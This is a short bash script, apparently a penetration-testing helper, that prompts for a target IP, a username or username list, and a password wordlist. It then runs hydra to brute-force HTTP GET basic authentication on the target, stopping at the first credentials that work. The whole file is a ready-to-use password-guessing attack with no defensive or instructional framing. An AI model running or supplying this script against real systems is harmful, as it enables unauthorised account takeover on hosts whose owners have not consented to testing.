#!/bin/bash
#Ask User for HTTP IP Address.

echo Please enter the IP Address where the HTTP Get Request is located:
read ipAddress

#Determine if List or Single Username
echo Are you using a single username? Or a List?
echo Type 1 for Username.
echo Type 2 for List.

read listOrUsername

if [ $listOrUsername -eq 1 ]
then
  echo Please enter a username to brute force:
  read userName
  userNameArg="-l"

else
  echo Please enter the path to the list of usernames.
  read userName
  userNameArg="-L"
fi

#Ask User for wordlist from /usr/share/wordlists (NEEDS .txt extension)
echo Please enter the path to the password wordlist:
read wordListName

hydra $ipAddress http-get -v -V $userNameArg $userName -P $wordListName -e ns -t 5 -w 30 -m / -f
